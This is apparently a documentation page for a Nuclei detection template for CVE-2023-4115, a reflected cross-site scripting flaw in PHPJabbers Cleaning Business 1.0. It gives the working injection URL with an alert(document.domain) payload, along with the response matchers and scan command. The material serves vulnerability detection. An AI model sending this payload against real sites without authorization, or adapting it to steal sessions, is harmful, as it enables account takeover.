PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting
ID: CVE-2023-4115
Severity: medium
Author: r3Y3r53
Tags: cve2023,cve,xss,phpjabber,jabber,phpjabbers
Description
Section titled “Description”The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim’s session token or login credentials.
YAML Source
Section titled “YAML Source”id: CVE-2023-4115
info: name: PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. reference: - https://www.exploitalert.com/view-details.html?id=39747 - https://cxsecurity.com/ascii/WLB-2023080015 - https://nvd.nist.gov/vuln/detail/CVE-2023-4115 - https://vuldb.com/?ctiid.235962 - https://vuldb.com/?id.235962 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-4115 cwe-id: CWE-79 epss-score: 0.0027 epss-percentile: 0.67777 cpe: cpe:2.3:a:phpjabbers:cleaning_business_software:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: phpjabbers product: cleaning_business_software tags: cve2023,cve,xss,phpjabber,jabber,phpjabbers
http: - method: GET path: - "{{BaseURL}}/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains_all(body, "Enquiry summary", "><script>alert(document.domain)</script>")' condition: and# digest: 4b0a00483046022100a52889135d5a35f664c1b795ad9fa144758ac77879bde3fd540baa9d3e175039022100c2f573e52be42b0971a3a2b9b46f84ea5b7f6a9da5f4915bbd296b907a61b845:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-4115.yaml"